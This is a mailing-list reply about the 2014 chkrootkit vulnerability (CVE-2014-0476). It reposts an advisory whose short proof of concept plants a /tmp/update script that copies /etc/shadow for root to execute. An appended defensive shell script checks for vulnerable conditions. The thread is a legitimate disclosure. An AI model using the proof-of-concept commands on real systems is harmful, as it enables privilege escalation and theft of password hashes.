Re: Should I install chkrootkit?
Guess that is the matter:
https://www.debian.org/security/2014/dsa-2945
--hh
Just reposting:
Date: Thu, 05 Jun 2014 06:27:35 +0000
From: "mancha" <mancha1@hush.com>
To: slackbuilds-users@slackbuilds.org
Subject: [Slackbuilds-users] chkrootkit vulnerability
Hi.
As ironic as it sounds, chkrootkit 0.49 can be turned into a
rootkit.
On systems where /tmp is not mounted noexec, a regular user can
create a file /tmp/update which chkrootkit will execute with root
privileges each time it's run.
Here's a simple PoC...as normal user:
$ echo -e '#!/bin/bash\ncat /etc/shadow > /tmp/stolen' > /tmp/update
$ chmod 755 /tmp/update
As root:
# chkrootkit
Now the user has access to the shadow password file (/tmp/stolen).
Solution: Update to chkrootkit 0.50
--mancha
-----------------
PGP: 0x25168EB24F0B22AC
[56B7 100E F4D5 811C 8FEF ADD1 2516 8EB2 4F0B 22AC]
Horatio Leragon <hleragon@yahoo.com> wrote (Wed, 4 Jun 2014 04:38:45 -0700 (PDT)):
> I received a security update advisory [SECURITY] [DSA 2945-1] today.
>
> Package : chkrootkit
> CVE ID : CVE-2014-0476
>
> I am shocked to learn that Debian is vulnerable to rootkits. That's
> why there's a package to check for them.
>
> I switched to Debian from Microsoft Windows OS because of the massive
> over-hype that I read on the internet: that Debian is impervious to
> malware and no viruses have ever infected a *nix OS.
>
>
> Should I install this package called "chkrootkit"?
>
> But then it itself is vulnerable to errors in its code :(
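A defender-side check for the two conditions named in the forwarded message (a chkrootkit older than 0.50, and a /tmp that is not mounted noexec), plus a look for a file at /tmp/update. This is an added example, not part of the original posts; the function names, output labels and sample mount table are constructed for illustration.

```shell
#!/bin/sh
# Added example: defender-side check for the conditions described in the thread.
# Function names and output labels are illustrative, not from chkrootkit.

# Constructed sample in /proc/mounts format (not from a real host).
sample_mounts() {
    printf '%s\n' '/dev/sda1 / ext4 rw,relatime 0 0' \
                  'tmpfs /tmp tmpfs rw,nosuid,nodev 0 0'
}

# tmp_mount_opts FILE DIR: options of the last mount entry for DIR, falling
# back to "/" when DIR is not its own mount point. FILE may be "-" for stdin.
tmp_mount_opts() {
    awk -v d="$2" '$2 == d { o = $4 } $2 == "/" { r = $4 }
                   END { print (o != "" ? o : r) }' "$1"
}

# is_noexec OPTS: succeeds when the comma-separated list contains noexec.
is_noexec() {
    case ",$1," in *,noexec,*) return 0 ;; *) return 1 ;; esac
}

# version_lt A B: succeeds when dotted version A is lower than B.
version_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= (n > m ? n : m); i++) {
            if (x[i] + 0 < y[i] + 0) exit 0
            if (x[i] + 0 > y[i] + 0) exit 1
        }
        exit 1
    }'
}

# audit FILE VERSION PATH: one finding per line. VERSION is supplied by the
# caller (for example from the package manager); 0.50 is the fixed release.
audit() {
    opts=$(tmp_mount_opts "$1" /tmp)
    if version_lt "$2" 0.50; then echo "VULNERABLE_VERSION $2"
    else echo "FIXED_VERSION $2"; fi
    if is_noexec "$opts"; then echo "TMP_NOEXEC"
    else echo "TMP_EXEC_ALLOWED"; fi
    # Any file at PATH deserves a look: 0.49 runs it with root privileges.
    if [ -e "$3" ]; then
        echo "UPDATE_FILE_PRESENT owner=$(ls -ld "$3" | awk '{ print $3 }')"
    fi
}

sample_mounts | audit - 0.49 /tmp/update
```

On a live host, pass /proc/mounts as the first argument and the installed chkrootkit version as the second.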